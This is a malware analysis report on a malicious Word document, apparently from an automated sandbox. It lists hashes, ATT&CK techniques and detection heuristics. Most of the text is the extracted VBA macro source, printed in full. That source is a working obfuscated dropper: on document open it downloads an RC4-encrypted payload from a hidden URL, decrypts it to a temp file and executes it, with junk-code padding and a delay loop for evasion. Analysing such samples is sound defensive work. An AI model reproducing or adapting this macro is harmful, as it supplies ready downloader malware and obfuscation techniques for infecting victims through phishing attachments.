Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f2846f88c462d658…

MALICIOUS

Office (OOXML)

40.3 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-10-01
MD5: 9f999d5bb3e3c2a339256823bfc43040 SHA-1: ccc15fb75576d645ebe2d9a9e8b1f9cf27b2b6cf SHA-256: f2846f88c462d65897bd8b32eed9a3ab007acbec8a0a433b9f7fd8feb5ed74e0
180 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious File

The file is an OOXML document containing VBA macros, including a Document_Open macro, which is a strong indicator of malicious intent. The document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass macro security. The presence of the 'Doc.Malware.Chronos-6897935-0' ClamAV signature further confirms its malicious nature, likely acting as a downloader for a second-stage payload.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 22156 bytes
SHA-256: 5b5c039a08bc39787289035ee08a6052116853958cd21c4fb8463afeb9d830b3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
163 of 277 identifiers look randomly generated (e.g. 'HZPNFjjDT2oc6c9Vy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Sub XtJgfXpzM0o Lib "msvbvm60" Alias "#183" (ByVal WFnd4OMfpypp As Long, ByVal MA8xSY34fYF As Long, ByVal Yr1EUCzWPEV As Long)
Private RHxGLF7sfU9jTA(0 To 255) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal BsQpCLLXzMEvnbP As Long, ByVal ByIUR9kXLkqd As String, ByVal IiE5gj As Long, FwLosyl3 As Long) As Integer
Private Type HnF3nxQRcws6HMjP
   UVv As Integer
   Qoey8CXRBAw3 As Integer
   O2jX1pn7C As Integer
   SNovaUJISNL As Integer
   R5EwrcPEV As Long
End Type
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef BVl3mNCKlwA As Long) As Long
Private NeeCb9nU As String
Private Declare Function InternetOpenA Lib "wininet" (ByVal O6ZjTnc8OFWA5Bv As String, ByVal NozkkMPUli As Long, ByVal AraM As String, ByVal UTFUHhkgrn0i4EzDT As String, ByVal QrQmF As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal TmZAxWwYeCO1Yf As Long) As Long
Private Type L4B1C0pyIp
   VAFd4ZagjNElZ As Long
   Xd4V8MZgn As Long
   RLz7m6u53j6da As Long
   MoYi3kw937sOiZ As Long
End Type
Private Type SdZ6VX73YaIjvCV7r
   YTNxZe1 As Long
   PsgpZ4s7JFnTtwm As String
   Nu5F8zzCCR As String
   GRswFGc460eKR As String
   XfJnRw6wqW As Long
   BXqanWDcNG6IJOz As Long
   BZl59mVWzJZ As Long
   LfvUBOWp As Long
   J9bvR3b2xs1 As Long
   VMI4ild0Cyy As Long
   KzjIDjo As Long
   DQKDZf6ptgL As Long
   P0TzA8k5axSX As Integer
   Jd8LvaAh As Integer
   JRP11gOcYuamB As Long
   LNqJpp3sSFAi As Long
   HlNQJVUgA As Long
   XKZXzHQ8udx As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal RqNE57PsnE6 As String, ByVal OO2mfAs4i6zKg As String, TcvsDu As Any, Tm87GuTDgI As Any, ByVal VSpjlsuu1 As Long, ByVal K1Zy As Long, QZmGMhCt5h8JUIY As Any, ByVal YaJkdiN6WRQ As String, U0h7Oa As SdZ6VX73YaIjvCV7r, AxRZ0A As L4B1C0pyIp) As Long
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal SdLGMi5LRTTc8OF As Long, ByVal GKmRqD0avhBh As String, ByVal JIT8V As String, ByVal PqbJ9yspgiViiWYI2 As Long, ByVal KezyxR As Long, ByVal HcNQZmZAxWwYeC As Long) As Long
Private Type UP6g2cwz9
   Jyq7kWxLEuXU As Byte
   Psfw7jyizqX2pBr() As Byte
End Type
Private Property Let Uv3FkJoNQA(Duor5EX1QDGRv As String)
Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
If (NeeCb9nU = Duor5EX1QDGRv) Then Exit Property
NeeCb9nU = Duor5EX1QDGRv
HmKeQofQiXVxVGCT() = StrConv(NeeCb9nU, vbFromUnicode)
L9EY5PIy8XL = Len(NeeCb9nU)
For Nz7m0PxKYWw = 0 To 255
RHxGLF7sfU9jTA(Nz7m0PxKYWw) = Nz7m0PxKYWw
Next Nz7m0PxKYWw
For Nz7m0PxKYWw = 0 To 255
HbS1melaNAS7H = (HbS1melaNAS7H + RHxGLF7sfU9jTA(Nz7m0PxKYWw) + HmKeQofQiXVxVGCT(Nz7m0PxKYWw Mod L9EY5PIy8XL)) Mod 256
L7N3MtqbtznJ = RHxGLF7sfU9jTA(Nz7m0PxKYWw)
RHxGLF7sfU9jTA(Nz7m0PxKYWw) = RHxGLF7sfU9jTA(HbS1melaNAS7H)
RHxGLF7sfU9jTA(HbS1melaNAS7H) = L7N3MtqbtznJ
Next
End Property
Private Function XCDD1KlyfOUL(MuPhPeG3mQ As String) As String
Dim LvAzbXXkWUDtDQ() As Byte
LvAzbXXkWUDtDQ() = StrConv(MuPhPeG3mQ, vbFromUnicode)
U4j0Mutcw LvAzbXXkWUDtDQ, Len(MuPhPeG3mQ)
XCDD1KlyfOUL = StrConv(LvAzbXXkWUDtDQ(), vbUnicode)
End Function
Private Function BRfjljWglIbMl(ByVal YJWdGt9qTqFwPH7i As String, ByVal VD95k1JIF As String, ByVal WVmg38wK9PrBsoCtu As String) As Boolean
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If
Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If
FP3AL83PNIVhYqp = InternetOpenA(IqAGSLPUAJG(Chr(67) + Chr(59) + Chr(213) + Chr(21) + Chr(152) + Chr(247) + Chr(165) + Chr(137) + Chr(22) + Chr(103) + Chr(186) + Chr(195) + Chr(29) + Chr(120) + Chr(96) + Chr(214) + Chr(246) + Chr(92) + Chr(44) + Chr(9) + Chr(6) + Chr(16) + Chr(144) + Chr(41) + Chr(68) + Chr(57) + Chr(183) + Chr(140) + Chr(2) + Chr(115) + Chr(127) + Chr(9) + Chr(142) + Chr(166) + Chr(107) + Chr(124) + Chr(21) + Chr(81) + Chr(45) + Chr(249) + Chr(16) + Chr(46) + Chr(215) + Chr(115) + Chr(22) + Chr(147) + Chr(29) + Chr(237) + Chr(9) + Chr(93) + Chr(31) + Chr(76) + Chr(87) + Chr(187) + Chr(48) + Chr(26) + Chr(205) + Chr(30) + Chr(194) + Chr(246) + Chr(158) + Chr(104) + Chr(0) + Chr(24) + Chr(182) + Chr(106) + Chr(151), "GqhL"), 1, vbNullString, vbNullString, 0)
Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
BkbpvlCIZj = 4
VS1rCLO33mU = 22
If BkbpvlCIZj + VS1rCLO33mU > 4 Then
VS1rCLO33mU = BkbpvlCIZj + 67
Else
MsgBox 57
End If
If FP3AL83PNIVhYqp = 0 Then
Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
ILWUKAm = 89
JRN9ZgNj6Yf = 89
If ILWUKAm + JRN9ZgNj6Yf > 4 Then
JRN9ZgNj6Yf = ILWUKAm + 42
Else
MsgBox 58
End If
  BRfjljWglIbMl = False
  Exit Function
End If
Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
WqZT6KvAVkyO = 74
OHPW2b0ZGFa = 62
If WqZT6KvAVkyO + OHPW2b0ZGFa > 4 Then
OHPW2b0ZGFa = WqZT6KvAVkyO + 97
Else
MsgBox 91
End If
Bhu6AVZ = InternetOpenUrlA(FP3AL83PNIVhYqp, YJWdGt9qTqFwPH7i, vbNullString, 0, &H4000000, 0)
Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
HbUu4uL = 81
GfUsdMAvdCRNJDXy8 = 16
If HbUu4uL + GfUsdMAvdCRNJDXy8 > 4 Then
GfUsdMAvdCRNJDXy8 = HbUu4uL + 39
Else
MsgBox 16
End If
If Bhu6AVZ = 0 Then
Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
AizpYIBM = 53
BYtWR9n2OwKs = 27
If AizpYIBM + BYtWR9n2OwKs > 4 Then
BYtWR9n2OwKs = AizpYIBM + 78
Else
MsgBox 22
End If
  YBoXWN0Xv = 0
Else
Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
Izv2Cof = 90
Ntxt3NxnUsY = 60
If Izv2Cof + Ntxt3NxnUsY > 4 Then
Ntxt3NxnUsY = Izv2Cof + 52
Else
MsgBox 30
End If
InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
JkOPSi = IFHWQgDBF4yZ
Dim V0fF89S As Long, HVcFPWU6 As Long
V0fF89S = 25
HVcFPWU6 = 85
If V0fF89S + HVcFPWU6 > 4 Then
HVcFPWU6 = V0fF89S + 3
Else
MsgBox 4
End If
Do While HzD7nSW <> 0
  InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  JkOPSi = JkOPSi + Mid(IFHWQgDBF4yZ, 1, HzD7nSW)
Loop
YBoXWN0Xv = Len(JkOPSi)
Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
K1Xi = 24
QZlNuLHUlh7Q2xe = 13
If K1Xi + QZlNuLHUlh7Q2xe > 4 Then
QZlNuLHUlh7Q2xe = K1Xi + 92
Else
MsgBox 53
End If
I0xSQ = FreeFile
Dim GPlaAi As Long, JIM8pwVkCW8UVbcg As Long
GPlaAi = 64
JIM8pwVkCW8UVbcg = 91
If GPlaAi + JIM8pwVkCW8UVbcg > 4 Then
JIM8pwVkCW8UVbcg = GPlaAi + 11
Else
MsgBox 51
End If
Open VD95k1JIF For Binary Access Write Lock Write As #I0xSQ
Put #I0xSQ, , XCDD1KlyfOUL(IqAGSLPUAJG(JkOPSi, WVmg38wK9PrBsoCtu))
Dim Oq8fiSM As Long, YvnMiEy2R6 As Long
Oq8fiSM = 80
YvnMiEy2R6 = 73
If Oq8fiSM + YvnMiEy2R6 > 4 Then
YvnMiEy2R6 = Oq8fiSM + 95
Else
MsgBox 28
End If
Close #I0xSQ
End If
InternetCloseHandle Bhu6AVZ
Dim B9v7TU As Long, JCVUa86krMIbHfc As Long
B9v7TU = 52
JCVUa86krMIbHfc = 59
If B9v7TU + JCVUa86krMIbHfc > 4 Then
JCVUa86krMIbHfc = B9v7TU + 10
Else
MsgBox 86
End If
InternetCloseHandle FP3AL83PNIVhYqp
JkOPSi = ""
If YBoXWN0Xv Then
  BRfjljWglIbMl = True
Dim KKDp5Ep2gOzyvo As Long, Tl1iPS1z8j As Long
KKDp5Ep2gOzyvo = 22
Tl1iPS1z8j = 75
If KKDp5Ep2gOzyvo + Tl1iPS1z8j > 4 Then
Tl1iPS1z8j = KKDp5Ep2gOzyvo + 14
Else
MsgBox 73
End If
End If
Dim LwX3RpBGRr As Long, Ne5f44rm9prF As Long
LwX3RpBGRr = 91
Ne5f44rm9prF = 13
If LwX3RpBGRr + Ne5f44rm9prF > 4 Then
Ne5f44rm9prF = LwX3RpBGRr + 2
Else
MsgBox 37
End If
End Function
Private Sub GuQHe80AnN(IoX() As HnF3nxQRcws6HMjP, FihxAWkN5rFeaSJ As Long, UyXExoRTt As Long, Dc4RjY As UP6g2cwz9)
Dim RB8PuM7tI59 As Integer, LNBqYXa9HC1mwf As Long
LNBqYXa9HC1mwf = 0
For RB8PuM7tI59 = 0 To (Dc4RjY.Jyq7kWxLEuXU - 1)
If (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 0) Then
If (IoX(LNBqYXa9HC1mwf).O2jX1pn7C = -1) Then
IoX(LNBqYXa9HC1mwf).O2jX1pn7C = FihxAWkN5rFeaSJ
IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
End If
LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).O2jX1pn7C
ElseIf (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 1) Then
If (IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = -1) Then
IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = FihxAWkN5rFeaSJ
IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
End If
LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3
Else
Stop
End If
Next
IoX(LNBqYXa9HC1mwf).SNovaUJISNL = UyXExoRTt
End Sub
Function IqAGSLPUAJG(Svpxb5hcj9Hc As String, YNVoDatBR As String) As String
Dim MpMnYYUrP73 As Long, ROetXCPNdldbjBRLL As Long
MpMnYYUrP73 = 22
ROetXCPNdldbjBRLL = 75
If MpMnYYUrP73 + ROetXCPNdldbjBRLL > 4 Then
ROetXCPNdldbjBRLL = MpMnYYUrP73 + 14
Else
MsgBox 73
End If
Dim byteArray() As Byte
byteArray() = StrConv(Svpxb5hcj9Hc, vbFromUnicode)
BUqflSnxcA4 byteArray(), YNVoDatBR
IqAGSLPUAJG = StrConv(byteArray(), vbUnicode)
Dim HTZPNFjjDT2 As Long, SaND1oEkTy6p As Long
HTZPNFjjDT2 = 71
SaND1oEkTy6p = 95
If HTZPNFjjDT2 + SaND1oEkTy6p > 4 Then
SaND1oEkTy6p = HTZPNFjjDT2 + 49
Else
MsgBox 87
End If
End Function
Private Function AFwPH7i46wGhOhKi(Optional A9PrBsoCtu7 As String = "0123456789") As String
Dim KX0xfoqZ As Long, XwCIaRypq03 As Long
KX0xfoqZ = 77
XwCIaRypq03 = 4
If KX0xfoqZ + XwCIaRypq03 > 4 Then
XwCIaRypq03 = KX0xfoqZ + 24
Else
MsgBox 64
End If
Dim V3K42() As Byte, GL8BfUcBbEoS() As Byte, RDQPNIVhYqp As Long, JUgDQryKOCh As Long, EazVmg38wK As Long, NFE As String
Dim Tb95B8i6DxgFsGcd As Long, HZPNFjjDT2oc6c9Vy As Long
Tb95B8i6DxgFsGcd = 56
HZPNFjjDT2oc6c9Vy = 13
If Tb95B8i6DxgFsGcd + HZPNFjjDT2oc6c9Vy > 4 Then
HZPNFjjDT2oc6c9Vy = Tb95B8i6DxgFsGcd + 71
Else
MsgBox 67
End If
EazVmg38wK = 0
Dim VGBgsnX3r5L As Long, Dxwz5QD As Long
VGBgsnX3r5L = 84
Dxwz5QD = 81
If VGBgsnX3r5L + Dxwz5QD > 4 Then
Dxwz5QD = VGBgsnX3r5L + 90
Else
MsgBox 62
End If
GKs2Tl:
Dim Uc0lRQhC4jaN7 As Long, Hl7hjLXCBG As Long
Uc0lRQhC4jaN7 = 85
Hl7hjLXCBG = 78
If Uc0lRQhC4jaN7 + Hl7hjLXCBG > 4 Then
Hl7hjLXCBG = Uc0lRQhC4jaN7 + 1
Else
MsgBox 33
End If
Randomize
NFE = Int(30 * Rnd)
If NFE < 4 Then GoTo GKs2Tl
EazVmg38wK = NFE
If EazVmg38wK > 0& Then
Dim EhzZDcEu As Long, Cm6XVQSt0NPM As Long
EhzZDcEu = 80
Cm6XVQSt0NPM = 94
If EhzZDcEu + Cm6XVQSt0NPM > 4 Then
Cm6XVQSt0NPM = EhzZDcEu + 52
Else
MsgBox 77
End If
Randomize
V3K42 = A9PrBsoCtu7
Dim QCwa3abOUkh As Long, SwyAklrkV6C4LZi As Long
QCwa3abOUkh = 84
SwyAklrkV6C4LZi = 53
If QCwa3abOUkh + SwyAklrkV6C4LZi > 4 Then
SwyAklrkV6C4LZi = QCwa3abOUkh + 74
Else
MsgBox 85
End If
RDQPNIVhYqp = Len(A9PrBsoCtu7) - 1&
EazVmg38wK = (EazVmg38wK * 2&) - 1&
Dim IUKvWfty As Long, PwY9F2JkA As Long
IUKvWfty = 29
PwY9F2JkA = 46
If IUKvWfty + PwY9F2JkA > 4 Then
PwY9F2JkA = IUKvWfty + 69
Else
MsgBox 24
End If
ReDim GL8BfUcBbEoS(EazVmg38wK) As Byte
For JUgDQryKOCh = 0& To EazVmg38wK Step 2&
GL8BfUcBbEoS(JUgDQryKOCh) = V3K42(CLng(RDQPNIVhYqp * Rnd) * 2&)
Next
Dim DiT8qxL As Long, Ht4qxpGiCdM As Long
DiT8qxL = 94
Ht4qxpGiCdM = 50
If DiT8qxL + Ht4qxpGiCdM > 4 Then
Ht4qxpGiCdM = DiT8qxL + 10
Else
MsgBox 78
End If
End If
Dim DqjDljxQl1 As Long, OYFEfskkJd As Long
DqjDljxQl1 = 72
OYFEfskkJd = 42
If DqjDljxQl1 + OYFEfskkJd > 4 Then
OYFEfskkJd = DqjDljxQl1 + 7
Else
MsgBox 12
End If
AFwPH7i46wGhOhKi = GL8BfUcBbEoS
Dim OtzUoqPfJBgR As Long, TcUKOAdU5u As Long
OtzUoqPfJBgR = 81
TcUKOAdU5u = 17
If OtzUoqPfJBgR + TcUKOAdU5u > 4 Then
TcUKOAdU5u = OtzUoqPfJBgR + 11
Else
MsgBox 54
End If
End Function
Sub HOglzOSpjr9h(JKRfEn As Long)
Dim CAplbsdkljPz7 As Long, Id24U2e1NOsFmrSQm As Long
CAplbsdkljPz7 = 77
Id24U2e1NOsFmrSQm = 73
If CAplbsdkljPz7 + Id24U2e1NOsFmrSQm > 4 Then
Id24U2e1NOsFmrSQm = CAplbsdkljPz7 + 39
Else
MsgBox 17
End If
Dim PocouifAMac As Long
Dim FOAdU5ue As Long, DRPjKIqgqa As Long
FOAdU5ue = 98
DRPjKIqgqa = 37
If FOAdU5ue + DRPjKIqgqa > 4 Then
DRPjKIqgqa = FOAdU5ue + 48
Else
MsgBox 63
End If
PocouifAMac = Timer + JKRfEn
Do While Timer < PocouifAMac
DoEvents
Loop
Dim JjMWu As Long, Oe6vqA48 As Long
JjMWu = 28
Oe6vqA48 = 49
If JjMWu + Oe6vqA48 > 4 Then
Oe6vqA48 = JjMWu + 60
Else
MsgBox 53
End If
End Sub
Sub BUqflSnxcA4(N5eK6er7Tq80J5O() As Byte, Optional Nn4LNDdOko As String)
Dim AqfL As Long, USK5uYyaKrznfrpS As Long, UISSgE9sWQpCZRT As Byte, GE0OEFxN540yRo As Long, I4uc9FMhZVQ5 As Long, I0xRV As Long, YBnG6IJOz(0 To 255) As Integer
If (Len(Nn4LNDdOko) > 0) Then Uv3FkJoNQA = Nn4LNDdOko
XtJgfXpzM0o 512, VarPtr(YBnG6IJOz(0)), VarPtr(RHxGLF7sfU9jTA(0))
I4uc9FMhZVQ5 = UBound(N5eK6er7Tq80J5O) + 1
I0xRV = I4uc9FMhZVQ5
For GE0OEFxN540yRo = 0 To (I4uc9FMhZVQ5 - 1)
AqfL = (AqfL + 1) Mod 256
USK5uYyaKrznfrpS = (USK5uYyaKrznfrpS + YBnG6IJOz(AqfL)) Mod 256
UISSgE9sWQpCZRT = YBnG6IJOz(AqfL)
YBnG6IJOz(AqfL) = YBnG6IJOz(USK5uYyaKrznfrpS)
YBnG6IJOz(USK5uYyaKrznfrpS) = UISSgE9sWQpCZRT
N5eK6er7Tq80J5O(GE0OEFxN540yRo) = N5eK6er7Tq80J5O(GE0OEFxN540yRo) Xor (YBnG6IJOz((YBnG6IJOz(AqfL) + YBnG6IJOz(USK5uYyaKrznfrpS)) Mod 256))
Next
End Sub
Private Function I6aL9VLToJH(IIJfd79SYH5wwt As String)
Dim Oq6oBCvt As Long, FJRGcif8CeY As Long
Oq6oBCvt = 73
FJRGcif8CeY = 96
If Oq6oBCvt + FJRGcif8CeY > 4 Then
FJRGcif8CeY = Oq6oBCvt + 29
Else
MsgBox 31
End If
Dim MoEVGldi9Pup9e As L4B1C0pyIp, QKALtRfjljW As SdZ6VX73YaIjvCV7r, P2aN9z5AlMfsXf8 As String
Dim B9v5cx As Long, JDTc31TT8AIYP9WO As Long
B9v5cx = 52
JDTc31TT8AIYP9WO = 60
If B9v5cx + JDTc31TT8AIYP9WO > 4 Then
JDTc31TT8AIYP9WO = B9v5cx + 10
Else
MsgBox 60
End If
QKALtRfjljW.YTNxZe1 = Len(QKALtRfjljW)
Dim P7eVeEw As Long, C15ddnl As Long
P7eVeEw = 27
C15ddnl = 10
If P7eVeEw + C15ddnl > 4 Then
C15ddnl = P7eVeEw + 36
Else
MsgBox 56
End If
CreateProcessA P2aN9z5AlMfsXf8, IIJfd79SYH5wwt, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, P2aN9z5AlMfsXf8, QKALtRfjljW, MoEVGldi9Pup9e
Dim LhmuH4VRs1xHC As Long, H6q6euaQG As Long
LhmuH4VRs1xHC = 21
H6q6euaQG = 56
If LhmuH4VRs1xHC + H6q6euaQG > 4 Then
H6q6euaQG = LhmuH4VRs1xHC + 95
Else
MsgBox 32
End If
CloseHandle MoEVGldi9Pup9e.Xd4V8MZgn
Dim INFCAmW As Long, U8anbJYc3TqIt As Long
INFCAmW = 91
U8anbJYc3TqIt = 42
If INFCAmW + U8anbJYc3TqIt > 4 Then
U8anbJYc3TqIt = INFCAmW + 92
Else
MsgBox 14
End If
CloseHandle MoEVGldi9Pup9e.VAFd4ZagjNElZ
Dim DTX1gtN5Etn As Long, ITR2NqD73zEjThC As Long
DTX1gtN5Etn = 39
ITR2NqD73zEjThC = 74
If DTX1gtN5Etn + ITR2NqD73zEjThC > 4 Then
ITR2NqD73zEjThC = DTX1gtN5Etn + 68
Else
MsgBox 13
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim LicbWXf9C39mI As Long, YltsZTviWcDTTKc As Long
LicbWXf9C39mI = 97
YltsZTviWcDTTKc = 97
If LicbWXf9C39mI + YltsZTviWcDTTKc > 4 Then
YltsZTviWcDTTKc = LicbWXf9C39mI + 50
Else
MsgBox 66
End If
Dim TCKNX7GS4f1GV0Ho As String
Dim Oa2PY3b09Ma8Osw As Long, KEJJJJS0yRP6B As Long
Oa2PY3b09Ma8Osw = 69
KEJJJJS0yRP6B = 9
If Oa2PY3b09Ma8Osw + KEJJJJS0yRP6B > 4 Then
KEJJJJS0yRP6B = Oa2PY3b09Ma8Osw + 64
Else
MsgBox 72
End If
Dim Dmw40jHKBJjB9 As Long, IaSts As Long, YQS6bf2fAQnn As Long, IaP5sruk As Integer
Dim PTCG0rEhEjTjzJVD As Long, KjhQdJYB4mT9F As Long
PTCG0rEhEjTjzJVD = 33
KjhQdJYB4mT9F = 12
If PTCG0rEhEjTjzJVD + KjhQdJYB4mT9F > 4 Then
KjhQdJYB4mT9F = PTCG0rEhEjTjzJVD + 51
Else
MsgBox 32
End If
Dmw40jHKBJjB9 = 972912137: IaSts = 0: YQS6bf2fAQnn = 0
Dim KHFoa As Long, PRLSJPXfkG As Long
KHFoa = 14
PRLSJPXfkG = 17
If KHFoa + PRLSJPXfkG > 4 Then
PRLSJPXfkG = KHFoa + 35
Else
MsgBox 80
End If
For IaSts = 1 To Dmw40jHKBJjB9
YQS6bf2fAQnn = YQS6bf2fAQnn + 1
Next IaSts
Dim RZpj As Long, D8mlE4Yi As Long
RZpj = 80
D8mlE4Yi = 70
If RZpj + D8mlE4Yi > 4 Then
D8mlE4Yi = RZpj + 27
Else
MsgBox 31
End If
If YQS6bf2fAQnn = Dmw40jHKBJjB9 Then
Dim OLUvI As Long, T6UKy2acaAV As Long
OLUvI = 29
T6UKy2acaAV = 71
If OLUvI + T6UKy2acaAV > 4 Then
T6UKy2acaAV = OLUvI + 95
Else
MsgBox 24
End If
TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
Dim ULi3LSMNlBhC1 As Long, IAxLcX68j2 As Long
ULi3LSMNlBhC1 = 57
IAxLcX68j2 = 13
If ULi3LSMNlBhC1 + IAxLcX68j2 > 4 Then
IAxLcX68j2 = ULi3LSMNlBhC1 + 72
Else
MsgBox 42
End If
If BRfjljWglIbMl(IqAGSLPUAJG(Chr(165) + Chr(171) + Chr(208) + Chr(152) + Chr(194) + Chr(170) + Chr(210) + Chr(42) + Chr(115) + Chr(114) + Chr(162) + Chr(44) + Chr(182) + Chr(181) + Chr(222) + Chr(240) + Chr(0) + Chr(243) + Chr(36) + Chr(171) + Chr(110) + Chr(97) + Chr(59) + Chr(50) + Chr(35), "IL3o18Se4V3"), TCKNX7GS4f1GV0Ho, IqAGSLPUAJG(Chr(64) + Chr(61) + Chr(78) + Chr(113) + Chr(183) + Chr(138) + Chr(19) + Chr(108) + Chr(104), "YjNITkQAmKjm")) = True Then
Dim BxUKE9hlz9 As Long, Ef1V1XFqA7tOEw As Long
BxUKE9hlz9 = 20
Ef1V1XFqA7tOEw = 10
If BxUKE9hlz9 + Ef1V1XFqA7tOEw > 4 Then
Ef1V1XFqA7tOEw = BxUKE9hlz9 + 66
Else
MsgBox 69
End If
HOglzOSpjr9h 1
Dim KwNJNlJHYP As Long, LZGp6tFEOxl As Long
KwNJNlJHYP = 80
LZGp6tFEOxl = 25
If KwNJNlJHYP + LZGp6tFEOxl > 4 Then
LZGp6tFEOxl = KwNJNlJHYP + 66
Else
MsgBox 14
End If
I6aL9VLToJH TCKNX7GS4f1GV0Ho
Dim IVhK As Long, LU9NRXI6m As Long
IVhK = 31
LU9NRXI6m = 47
If IVhK + LU9NRXI6m > 4 Then
LU9NRXI6m = IVhK + 71
Else
MsgBox 26
End If
End If
Dim FZuzvL As Long, NCh3bV1jG As Long
FZuzvL = 49
NCh3bV1jG = 21
If FZuzvL + NCh3bV1jG > 4 Then
NCh3bV1jG = FZuzvL + 52
Else
MsgBox 59
End If
